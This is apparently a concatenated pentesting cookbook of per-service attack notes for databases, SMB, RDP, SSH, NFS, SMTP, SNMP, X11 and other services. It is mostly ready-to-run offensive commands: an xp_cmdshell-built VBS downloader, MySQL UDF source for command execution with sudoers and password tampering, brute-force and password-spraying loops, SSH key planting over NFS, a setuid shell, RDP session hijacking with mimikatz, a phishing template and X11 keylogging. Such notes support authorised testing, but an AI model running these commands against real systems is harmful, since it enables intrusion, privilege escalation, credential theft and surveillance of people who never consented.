WScript.Arguments.Item(0) > wget.vbs' 100 | go 101 | xp_cmdshell 'echo StrFile = WScript.Arguments.Item(1) >> wget.vbs' 102 | go 103 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs' 104 | go 105 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs' 106 | go 107 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs' 108 | go 109 | xp_cmdshell 'echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs' 110 | go 111 | xp_cmdshell 'echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs' 112 | go 113 | xp_cmdshell 'echo Err.Clear >> wget.vbs' 114 | go 115 | xp_cmdshell 'echo Set http = Nothing >> wget.vbs' 116 | go 117 | xp_cmdshell 'echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs' 118 | go 119 | xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs' 120 | go 121 | xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs' 122 | go 123 | xp_cmdshell 'echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs' 124 | go 125 | xp_cmdshell 'echo http.Open "GET",strURL,False >> wget.vbs' 126 | go 127 | xp_cmdshell 'echo http.Send >> wget.vbs' 128 | go 129 | xp_cmdshell 'echo varByteArray = http.ResponseBody >> wget.vbs' 130 | go 131 | xp_cmdshell 'echo Set http = Nothing >> wget.vbs' 132 | go 133 | xp_cmdshell 'echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs' 134 | go 135 | xp_cmdshell 'echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs' 136 | go 137 | xp_cmdshell 'echo strData = "" >> wget.vbs' 138 | go 139 | xp_cmdshell 'echo strBuffer = "" >> wget.vbs' 140 | go 141 | xp_cmdshell 'echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs' 142 | go 143 | xp_cmdshell 'echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs' 144 | go 145 | xp_cmdshell 'echo Next >> wget.vbs' 146 | go 147 | 
xp_cmdshell 'echo ts.Close >> wget.vbs' 148 | go 149 | 150 | `` Using sqsh 151 | 152 | ~$ cat ~/.freetds.conf 153 | [mssql1] 154 | host = VAR_TARGET_HOST 155 | port = 27900 156 | tds version = 8.0 157 | ~$ sqsh -S mssql1 -U sa 158 | > exec sp_configure "show advanced options", 1 159 | > go 160 | > reconfigure 161 | > go 162 | > exec sp_configure "xp_cmdshell", 1 163 | > go 164 | > reconfigure 165 | > go 166 | > xp_cmdshell "whoami" 167 | > go 168 | > xp_cmdshell "net user VAR_USERNAME VAR_PASSWORD /add" 169 | > xp_cmdshell "net localgroup administrators VAR_USERNAME /add" 170 | -------------------------------------------------------------------------------- /Target.Host.Service.DB.MySQL.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-info,mysql-query,mysql-users,mysql-variables VAR_TARGET_HOST 4 | 5 | -- NOTE: mysql-enum is unreliable 6 | 7 | `` Password Bruteforcing 8 | 9 | ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD mysql://VAR_TARGET_HOST 10 | 11 | -- With a list of targets 12 | ~$ hydra -V -t 4 -w 50 -f -l root -e nsr -P VAR_WORDLIST_PASSWORD -M VAR_TARGET_HOSTS mysql 13 | 14 | `` Dump 15 | 16 | ~$ mysqldump -h VAR_TARGET_HOST -u root -p --single-transaction --quick --lock-tables=false > dump.sql 17 | 18 | `` Extension upload 19 | 20 | SELECT @@plugin_dir; 21 | 22 | SELECT 0x7f454c...00000 into dumpfile "/var/lib/mysql/udf.so"; 23 | 24 | CREATE function sys_eval returns string soname 'udf.so'; 25 | SELECT * from mysql.func where name = 'sys_eval'; 26 | SELECT sys_eval('dir'); 27 | DROP function sys_eval; 28 | 29 | echo '' | xxd -ps | tr -d '\n' 30 | 31 | `` raptor.c 32 | 33 | #include 34 | #include 35 | 36 | enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT}; 37 | 38 | typedef struct st_udf_args { 39 | unsigned int arg_count; // number of arguments 40 
| enum Item_result *arg_type; // pointer to item_result 41 | char **args; // pointer to arguments 42 | unsigned long *lengths; // length of string args 43 | char *maybe_null; // 1 for maybe_null args 44 | } UDF_ARGS; 45 | 46 | typedef struct st_udf_init { 47 | char maybe_null; // 1 if func can return NULL 48 | unsigned int decimals; // for real functions 49 | unsigned long max_length; // for string functions 50 | char *ptr; // free ptr for func data 51 | char const_item; // 0 if result is constant 52 | } UDF_INIT; 53 | 54 | int do_cmd(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error) 55 | { 56 | if (args->arg_count != 1) 57 | return(0); 58 | system(args->args[0]); 59 | return(0); 60 | } 61 | 62 | char do_cmd_init(UDF_INIT *initid, UDF_ARGS *args, char *message) 63 | { 64 | return(0); 65 | } 66 | 67 | 68 | $ gcc -fPIC -g -c raptor.c 69 | $ gcc -g -shared -Wl,-soname,raptor.so -o raptor.so raptor.o -lc 70 | $ xxd -p -c `stat --format="%s" raptor.so` raptor.so 71 | 72 | mysql> SELECT '' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so' 73 | mysql> CREATE function do_cmd returns integer soname "raptor.so"; 74 | mysql> SELECT do_cmd("echo 'root:root'|chpasswd"); 75 | 76 | 77 | gcc -g -c raptor_udf2.c 78 | gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc 79 | mysql -u root 80 | mysql> use mysql; 81 | mysql> create table foo(line blob); 82 | mysql> insert into foo values(load_file('/dev/shm/raptor_udf2.so')); 83 | mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; 84 | mysql> create function do_system returns integer soname 'raptor_udf2.so'; 85 | mysql> select * from mysql.func; 86 | +-----------+-----+----------------+----------+ 87 | | name | ret | dl | type | 88 | +-----------+-----+----------------+----------+ 89 | | do_system | 2 | raptor_udf2-2.so | function | 90 | +-----------+-----+----------------+----------+ 91 | mysql> select do_system('adduser toor'); 92 | mysql> select do_system('echo "toor ALL=(ALL) ALL" 
>> /etc/sudoers'); 93 | mysql> select do_system('echo "toor:toor" | /usr/sbin/chpasswd'); 94 | -------------------------------------------------------------------------------- /Target.Host.Service.DB.PostgreSQL.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap VAR_TARGET_HOST -v -p 5432 -sV -Pn -vv 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -p 5432 --script pgsql-brute --script-args userdb=users.txt,passdb=VAR_WORDLIST VAR_TARGET_HOST 8 | ~$ hydra -L users.txt -V -P VAR_WORDLIST VAR_TARGET_HOST postgres 9 | 10 | `` Dump 11 | 12 | -- Dump single database 13 | ~$ pg_dump dbname | gzip > dump.gz 14 | 15 | -- Dump cluster 16 | ~$ pg_dumpall | gzip > dump.gz 17 | 18 | `` Database access 19 | 20 | ~$ psql -h VAR_TARGET_HOST -U postgres 21 | -------------------------------------------------------------------------------- /Target.Host.Service.FTP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -n -v -p 21 --script ftp-anon,ftp-syst VAR_TARGET_HOST 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -n -v -p 21 --script ftp-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD VAR_TARGET_HOST 8 | ~$ ncrack -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -T 5 VAR_TARGET_HOST -p 21 9 | ~$ medusa -h VAR_TARGET_HOST -u VAR_USERNAME -P VAR_WORDLIST_PASSWORD -M ftp 10 | 11 | `` Massive download 12 | 13 | ~$ wget --recursive --ftp-user=anonymous --ftp-password=any --no-passive-ftp ftp://VAR_TARGET_HOST 14 | -------------------------------------------------------------------------------- /Target.Host.Service.IDENT.txt: -------------------------------------------------------------------------------- 1 | `` User enumeration 2 | 3 | ~$ nmap -n -v -p 113 --script auth-owners VAR_TARGET_HOST -------------------------------------------------------------------------------- /Target.Host.Service.LDAP.txt: 
-------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | `` Anonymous 4 | 5 | ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -b "dc=VAR_DOMAIN,dc=com" 6 | LDAPExplorertool2 7 | 8 | `` Authenticated 9 | 10 | ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -D "CN=Administrator, CN=User, DC=VAR_DOMAIN, DC=com" -b "DC=VAR_DOMAIN, DC=com" -W 11 | -------------------------------------------------------------------------------- /Target.Host.Service.MSRPC.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -n -v -sV -Pn -p135 --script msrpc-enum --script-args vulns.showall VAR_TARGET_HOST 4 | 5 | `` Connect 6 | 7 | ~$ rpcclient -U VAR_TARGET_DOMAIN/VAR_USERNAME VAR_TARGET_HOST 8 | 9 | `` Version of the target Windows machine 10 | 11 | rpcclient $> srvinfo 12 | 13 | `` Specific user / computer information by RID 14 | 15 | rpcclient $> queryuser VAR_RID 16 | 17 | `` Domain 18 | 19 | rpcclient $> querydominfo 20 | 21 | `` Domain users, groups, shares, privileges 22 | 23 | rpcclient $> enumdomusers 24 | rpcclient $> enumdomgroups 25 | rpcclient $> querygroup VAR_RID 26 | rpcclient $> querygroupmem VAR_RID 27 | rpcclient $> queryuser VAR_RID 28 | rpcclient $> netshareenum 29 | rpcclient $> netshareenumall 30 | rpcclient $> enumprivs 31 | 32 | `` Reset domain user password 33 | 34 | rpcclient $> setuserinfo2 VAR_USERNAME 23 'VAR_PASSWORD' 35 | 36 | ~$ net rpc password administrator -U VAR_USERNAME -S VAR_TARGET_HOST 37 | 38 | `` Check domain password policy 39 | 40 | rpcclient $> getdompwinfo 41 | rpcclient $> getusrdompwinfo VAR_RID 42 | 43 | `` Password spraying 44 | 45 | ~$ rpcclient -U "VAR_USERNAME%VAR_PASSWORD" -c "getusername;quit" VAR_TARGET_HOST 46 | 47 | -- Snippet 48 | 49 | VAR_PASSWORD=Passw0rd 50 | VAR_TARGET_HOST=10.0.0.1 51 | for user in `cat domain-users.txt`; do 52 | echo -n "$user:$VAR_PASSWORD" && rpcclient -U "$user:$VAR_PASSWORD" -c "getusername;quit" 
$VAR_TARGET_HOST 53 | done 54 | -------------------------------------------------------------------------------- /Target.Host.Service.NFS.txt: -------------------------------------------------------------------------------- 1 | `` Scanning for accessible exports 2 | 3 | ~$ nmap -v -n -p 111 --script nfs-ls VAR_TARGET_NETWORK 4 | 5 | `` General 6 | 7 | ~$ showmount -e VAR_TARGET_HOST 8 | 9 | `` Mounting 10 | 11 | `` Anonymous 12 | 13 | ~$ mount -t nfs VAR_TARGET_HOST:/secret /tmp/remote_dir 14 | 15 | `` NFS #1 16 | 17 | ~$ mount -t nfs VAR_TARGET_HOST:/secret /mnt/share/ 18 | ~$ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys 19 | ~$ umount /mnt/share 20 | ~$ ssh root@VAR_TARGET_HOST 21 | 22 | `` NFS #2 23 | 24 | ~$ cat /etc/exports 25 | ~$ mkdir /tmp/.tmp 26 | ~$ mount -t nfs VAR_TARGET_HOST:/tmp /tmp/.tmp 27 | ~$ ls -lah /tmp/.tmp 28 | ~$ gcc -o /tmp/.tmp/shell shell.c 29 | ~$ root@kali:/tmp/.tmp# chown root:root shell 30 | ~$ root@kali:/tmp/.tmp# chmod +s shell 31 | 32 | `` I/O Error? 
33 | 34 | ~$ mount -t nfs -o nfsvers=2 VAR_TARGET_HOST:/secret /tmp/remote_dir -------------------------------------------------------------------------------- /Target.Host.Service.POP3.txt: -------------------------------------------------------------------------------- 1 | `` Password Bruteforcing 2 | 3 | ~$ nmap -n -v -p 995 --script pop3-brute --script-args=vulns.showall VAR_TARGET_HOST 4 | ~$ hydra -I -l VAR_USERNAME -e nsr -P VAR_WORDLIST_PASSWORD -f -V pop3://VAR_TARGET_HOST 5 | ~$ hydra -I -C VAR_WORDLIST_COMBO -e nsr -t 10 -V pop3://VAR_TARGET_HOST 6 | -------------------------------------------------------------------------------- /Target.Host.Service.RDP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST 4 | 5 | `` Connection 6 | 7 | ~$ rdesktop -u guest -p guest VAR_TARGET_HOST -g 85% 8 | ~$ rdesktop -u VAR_USERNAME -p VAR_PASSWORD -g 85% -r disk:share=/root/ VAR_TARGET_HOST 9 | 10 | `` PTH 11 | 12 | -- PTH available for Windows 2012 R2 and Windows 8.1 13 | ~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST 14 | 15 | `` Password Bruteforcing 16 | 17 | ~$ hydra -V -t 1 -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD rdp://VAR_TARGET_HOST 18 | ~$ ncrack -vv --pairwise -U ../usernames.txt -P ../passwords.txt -f --stealthy-linear rdp://VAR_TARGET_HOST 19 | 20 | `` Hijacking disconnected sessions 21 | 22 | `` Using service 23 | 24 | ~> query user 25 | -- grab session names or IDs 26 | ~> sc.exe create VAR_STRING binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1" type= own 27 | ~> sc.exe start VAR_STRING 28 | ~> sc.exe delete VAR_STRING 29 | 30 | `` Using mimikatz 31 | 32 | ~> mimikatz 33 | mimikatz # ts::sessions 34 | mimikatz # privilege::debug 35 | mimikatz # token::elevate 36 | mimikatz # ts::remote /id:2 37 | -------------------------------------------------------------------------------- 
/Target.Host.Service.RPC.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ rpcinfo -p VAR_TARGET_HOST 4 | ~$ nmap --script rpcinfo --script-args=unsafe=1 -p VAR_TARGET_PORT VAR_TARGET_HOST 5 | ~$ nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p VAR_TARGET_PORT VAR_TARGET_HOST 6 | -------------------------------------------------------------------------------- /Target.Host.Service.SMB.txt: -------------------------------------------------------------------------------- 1 | `` Check remote target access 2 | 3 | ~> net use \\VAR_TARGET_HOST\C$ 4 | ~> dir \\VAR_TARGET_HOST\C$ 5 | 6 | `` Enumeration 7 | 8 | -- NetBIOS information 9 | ~$ nbtscan -vh VAR_TARGET_HOST 10 | 11 | -- Version if anything else fails 12 | ~$ smbver.sh 13 | 14 | -- Check for permissions first 15 | ~$ smbmap -H VAR_TARGET_HOST 16 | 17 | -- Anything more? 18 | ~$ enum4linux -a VAR_TARGET_HOST 19 | 20 | -- Null session allowed? 21 | ~$ smbclient -N -L VAR_TARGET_HOST 22 | ~> net use \\VAR_TARGET_HOST\IPC$ "" /u:"" 23 | 24 | -- Passwordless admin? 
25 | ~$ smbclient //VAR_TARGET_HOST/ipc$ -U Administrator 26 | 27 | `` Vulnerability scanning 28 | 29 | ~$ nmap -v -n -p 139,445 -sS -g 53 --script=smb-double-pulsar-backdoor,"smb-enum-*",smb-ls,smb-mbenum,smb-enum-users,smb-os-discovery,smb-print-text,smb-psexec,smb-security-mode,smb-server-stats,"smb-vuln-*","smb2-*" --script-args=vulns.showall --script-args=unsafe=1 VAR_TARGET_HOST 30 | 31 | `` Shares listing 32 | 33 | ~> net view \\VAR_TARGET_HOST /all 34 | ~$ smbmap -u VAR_USERNAME -p VAR_PASSWORD -H VAR_TARGET_HOST 35 | ~$ nmap --script smb-enum-shares -p139,445 -v -n --open VAR_TARGET_HOST 36 | ~$ smbclient -U "VAR_USERNAME%VAR_PASSWORD" \\\\VAR_DOMAIN\SYSVOL 37 | 38 | `` Share mount 39 | 40 | ~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o,username=VAR_TARGET_DOMAIN/VAR_USERNAME,password=VAR_PASSWORD,vers=2.0 41 | # SMBv2 42 | 43 | `` Various 44 | 45 | ~$ nbtscan -r VAR_TARGET_HOST 46 | ~$ smbclient //VAR_TARGET_HOST/ipc$ 47 | ~$ smbclient //VAR_TARGET_HOST/admin$ 48 | ~$ smbclient -W VAR_TARGET_DOMAIN -U user -L VAR_TARGET_HOST 49 | ~$ proxychains smbclient '//VAR_TARGET_HOST/C$' -U 'VAR_TARGET_DOMAIN/VAR_USERNAME%VAR_PASSWORD' 50 | 51 | `` Recursive download 52 | 53 | ~$ smbclient -N //VAR_TARGET_HOST/C$ 54 | smb: \> mask "" 55 | smb: \> prompt 56 | smb: \> recurse 57 | smb: \> mget Users 58 | -------------------------------------------------------------------------------- /Target.Host.Service.SMTP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap --script smtp-commands,smtp-enum-users -vv -sV -Pn -p 25 VAR_TARGET_HOST 4 | 5 | `` Testing 6 | 7 | ~$ swaks --to user@VAR_TARGET_HOST --from user@example.com --server VAR_TARGET_HOST:25 --body "Some text" --header "Subject: Important" 8 | 9 | `` Password Bruteforcing 10 | 11 | ~$ hydra -I -P VAR_WORDLIST -V smtp://VAR_TARGET_HOST 12 | 13 | `` User enumeration 14 | 15 | ~$ nc -nv VAR_TARGET_HOST 25 16 | VRFY VAR_USERNAME 17 | 18 | ~$ 
smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t VAR_TARGET_HOST 19 | 20 | ~$ hydra smtp-enum://VAR_TARGET_HOST/vrfy -l VAR_USERNAME -p localhost 21 | 22 | `` Phishing with swaks (HTML template) 23 | 24 | swaks --from sender@example.com --h-From: '=?utf-8?B?VAR_BASE64_VALUE?= ' --to receiver@example.com,bcc@example.com --h-To: '"ASCII without encoding" ' --server VAR_TARGET_HOST:25 --attach-type "text/html;charset=utf-8" --attach-body body.html --header "Subject: =?utf-8?B?VAR_BASE64_VALUE?=" --attach-type "image/png" --attach logo.png -------------------------------------------------------------------------------- /Target.Host.Service.SNMP.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | `` Network discovery 4 | 5 | ~$ nmap -sU -sV -p 161 VAR_TARGET_RANGE 6 | ~$ onesixtyone -s -o VAR_FILENAME VAR_TARGET_CIDR 7 | ~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt VAR_TARGET_HOST 8 | ~$ hydra -P /usr/share/seclists/Discovery/SNMP/snmp.txt -V VAR_TARGET_HOST snmp 9 | 10 | `` Basic 11 | 12 | ~$ nmap -v -sV -Pn -sU -p 161,162 --script snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users VAR_TARGET_HOST 13 | 14 | `` Extended 15 | 16 | ~$ python ./snmpbrute.py -t VAR_TARGET_HOST -f /usr/share/seclists/Discovery/SNMP/snmp.txt 17 | ~$ xprobe2 -v -p udp:161:open VAR_TARGET_HOST 18 | ~$ snmp-check VAR_TARGET_HOST -c public 19 | 20 | `` FTP Bounce scanning 21 | 22 | ~$ nmap VAR_TARGET_HOST -b VAR_FTP_HOST -Pn -n -g 88 -v -sU -p 161,162 --script snmp-netstat,snmp-processes 23 | 24 | `` Network range 25 | 26 | #!/bin/bash 27 | for ip in $(cat ip_list.txt); do 28 | echo $ip; 29 | for str in $(cat /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings_onesixtyone.txt); do 30 | if snmpwalk -OsS -v 1 -c $str $ip > $ip.snmpwalk; then 31 | break 32 | fi 33 | done; 34 | done 35 | 36 | `` 
Table 37 | 38 | - 1.3.6.1.2.1.25.1.6.0 - System Processes 39 | - 1.3.6.1.2.1.25.2.3.1.4 - Storage Units 40 | - 1.3.6.1.2.1.25.4.2.1.2 - Running Programs 41 | - 1.3.6.1.2.1.25.4.2.1.4 - Processes Path 42 | - 1.3.6.1.2.1.25.6.3.1.2 - Software Name 43 | - 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports 44 | - 1.3.6.1.4.1.77.1.2.25 - User Accounts 45 | 46 | `` Community strings 47 | 48 | - /usr/share/wordlists/fasttrack.txt 49 | 50 | `` Community string bruteforcing 51 | 52 | ~$ nmap -sU VAR_TARGET_HOST -p 161 --script snmp-brute -Pn --script-args snmp-brute.communitiesdb=/usr/share/wordlists/fasttrack.txt 53 | ~$ onesixtyone -c /usr/share/wordlists/dirb/small.txt VAR_TARGET_HOST 54 | 55 | ~$ for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt);do snmpwalk -v 1 -c $i VAR_TARGET_HOST;done| grep -v "Timeout" 56 | 57 | ~$ echo public > community-strings.txt 58 | ~$ echo private >> community-strings.txt 59 | ~$ echo manager >> community-strings.txt 60 | ~$ for ip in $(seq 1 254);do echo VAR_TARGET_HOST_BASE.$ip;done > ips 61 | ~$ onesixtyone -c community-strings.txt -i ips 62 | 63 | ~$ hydra -P password-file.txt -V VAR_TARGET_HOST snmp 64 | 65 | `` Community string checks 66 | 67 | ~$ snmp-check VAR_TARGET_HOST -c public 68 | ~$ snmpget -v 1 -c public VAR_TARGET_HOST 69 | ~$ snmpwalk -v 1 -c public VAR_TARGET_HOST 70 | ~$ snmpbulkwalk -v2c -c public -Cn0 -Cr10 VAR_TARGET_HOST 71 | 72 | `` Windows users 73 | 74 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.25 75 | 76 | `` Running processes 77 | 78 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST P 1.3.6.1.2.1.25.4.2.1.2 79 | 80 | `` Open TCP ports 81 | 82 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.6.13.1.3 83 | 84 | `` Installed software 85 | 86 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.25.6.3.1.2 87 | 88 | `` Shares 89 | 90 | ~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.3.1.1 91 | 92 | `` Password Bruteforcing 93 | 94 | ~$ hydra -P VAR_WORDLIST -V VAR_TARGET_HOST snmp 
95 | -------------------------------------------------------------------------------- /Target.Host.Service.SSH.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR_TARGET_HOST 4 | 5 | `` Generate public key from private 6 | 7 | ~$ ssh-keygen -f id_rsa -y > id_rsa.pub 8 | 9 | `` Password Bruteforcing 10 | 11 | -- Verbose (-V), ignore previous results (-I), quit if matches (-F) 12 | 13 | -- Default port 14 | ~$ hydra -V -I -F -L VAR_WORDLIST_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST 15 | 16 | -- Maximum wait 80, wait between 3, wait 1 per login attempt 17 | ~$ hydra -V -I -F -t 1 -w 80 -c 1 -W 3 -f -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST 18 | 19 | -- Use single username and non-default port 20 | ~$ hydra -V -I -F -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -s VAR_TARGET_PORT -e nsr ssh://VAR_TARGET_HOST 21 | 22 | -- Use combined file (login:pass) and host list 23 | ~$ hydra -V -F -C VAR_WORDLIST_COMBO -M VAR_TARGET_HOSTS ssh 24 | 25 | `` With keys 26 | 27 | `` Single 28 | 29 | ~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/id_rsa 30 | 31 | `` All 32 | 33 | ~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/ 34 | 35 | `` All in discovery mode 36 | 37 | ~$ crowbar.py -b sshkey -s VAR_TARGET_CIDR -u root -k /root/.ssh/ -d 38 | 39 | `` Enumerate users 40 | 41 | ~$ ssh_enum_time.py -U usernames.txt VAR_TARGET_HOST 42 | 43 | `` Legacy issues 44 | 45 | -- No matching key exchange method found 46 | ~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 VAR_USERNAME@VAR_TARGET_HOST 47 | 48 | -- No matching host key type found 49 | ~$ ssh -oHostKeyAlgorithms=+ssh-dss VAR_USERNAME@VAR_TARGET_HOST 50 | 51 | `` PuTTY to OpenSSH 52 | 53 | ~$ puttygen id_rsa.ppk -O private-openssh -o id_rsa 54 | ~$ puttygen id_rsa.ppk -O public-openssh -o id_rsa.pub 
55 | -------------------------------------------------------------------------------- /Target.Host.Service.TELNET.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap -v -n -p 23 VAR_TARGET_NETWORK 4 | 5 | `` Password Bruteforcing 6 | 7 | ~$ nmap -n -v -p 23 --script telnet-brute --script-args userdb=VAR_WORDLIST_USER,passdb=VAR_WORDLIST_PASSWORD,brute.firstonly=true VAR_TARGET_HOST 8 | 9 | -- When username not required 10 | ~$ nmap -n -v -p 23 --script telnet-brute --script-args passdb=VAR_WORDLIST_PASSWORD,brute.firstonly=true,brute.passonly=true VAR_TARGET_HOST 11 | -------------------------------------------------------------------------------- /Target.Host.Service.VNC.txt: -------------------------------------------------------------------------------- 1 | `` Password Bruteforcing 2 | 3 | ~$ hydra -s 5900 -P VAR_WORDLIST -V -t 8 VAR_TARGET_HOST vnc 4 | 5 | ~$ crowbar.py -b vnckey -s VAR_CIDR -p 5902 -k /root/.vnc/passwd 6 | -------------------------------------------------------------------------------- /Target.Host.Service.X11.txt: -------------------------------------------------------------------------------- 1 | `` Scanning 2 | 3 | ~$ nmap --script x11-access -p6000-6025 -n -v -Pn VAR_TARGET_HOST 4 | 5 | `` Information Gathering 6 | 7 | ~$ xwininfo -root -display VAR_TARGET_HOST:0 8 | ~$ xspy -display VAR_TARGET_HOST:0 9 | 10 | `` Connection 11 | 12 | -- Screen grabbing 13 | ~$ xwd -root -screen -silent -display VAR_TARGET_HOST:0 > screen.xwd 14 | ~$ convert screen.xwd screen.png 15 | 16 | -- Disable screensaver 17 | ~$ xset -display VAR_TARGET_HOST:0.0 s reset 18 | 19 | -- Connect to remote session 20 | ~$ xwatchwin -w VAR_STRING VAR_TARGET_HOST:0 21 | 22 | -- Keylogging 23 | ~$ xspy VAR_TARGET_HOST -------------------------------------------------------------------------------- /Target.Network.Scanning.txt: -------------------------------------------------------------------------------- 1 | 
`` Host discovery 2 | 3 | `` ARP 4 | 5 | ~$ arp -a 6 | ~$ arp-scan VAR_TARGET_CIDR -I eth0 7 | ~$ fping -ar 8 | 9 | `` TCP/IP 10 | 11 | -- Set some variables first 12 | ~$ export VAR_TARGET_CIDR=10.10.10.0/24 13 | ~$ export VAR_FILENAME=${VAR_TARGET_CIDR::${#VAR_TARGET_CIDR}-3} 14 | ~$ export VAR_TARGET_HOSTS=$VAR_FILENAME-hosts.txt 15 | 16 | -- Ping scan only, no DNS resolution 17 | ~$ nmap -sn -n -oA $VAR_FILENAME-ping-basic $VAR_TARGET_CIDR 18 | 19 | -- When ICMP is not available; not exhaustive, and mostly for internal networks 20 | ~# nmap -sn -n -v -PA21,22,80,111,139,161,162,389,443,445 -PS21,22,80,111,139,161,162,389,443,445 -PU69,161,162,111,123,500 -oA $VAR_FILENAME-ping-fast $VAR_TARGET_CIDR 21 | 22 | -- A more in-depth discovery 23 | @ ~/lib/pentesting-cookbook/bin/scan_top.sh 24 | 25 | -- In case the scan fails: 26 | - Change source port, e.g. -g53 or -g88 27 | - Add --randomize-hosts 28 | - Change -PA to -PS 29 | - Run with --unprivileged 30 | 31 | -- Discovery using TCP over SOCKS 32 | ~$ proxychains -q nmap -sn -n -PA21,22,23,80,111,123,137,138,139,161,389,443,445 VAR_TARGET_CIDR 33 | 34 | ~$ nbtscan -r VAR_TARGET_CIDR 35 | ~$ netdiscover -i eth1 -P -N -r VAR_TARGET_CIDR 36 | ~$ for i in $(seq 1 254); do ip_address="192.168.1.$i"; ping -c 1 -W 1 $ip_address | grep "bytes from" >/dev/null && echo "$ip_address :)" || echo -n "."; done 37 | 38 | `` Nmap ping scan types (root only) 39 | 40 | ~# nmap -sn -n -PE VAR_TARGET_CIDR 41 | 42 | PS - TCP SYN (default at port 80) 43 | PA - TCP ACK (default at port 80) 44 | PU - UDP 45 | PY - SCTP INIT 46 | PE - ICMP Echo 47 | PP - ICMP timestamp 48 | PM - ICMP address mask 49 | PO - Other IP protocol 50 | PR - ARP scan 51 | 52 | `` Data processing 53 | 54 | ~$ grep "Status: Up" $VAR_FILENAME-*.gnmap | cut -d" " -f2 | sort | uniq > $VAR_TARGET_HOSTS 55 | 56 | `` Service discovery 57 | 58 | -- Using input from network scanning: $VAR_TARGET_HOSTS 59 | 60 | `` Basic (with default nmap top ports) 61 | 62 | -- Basic 
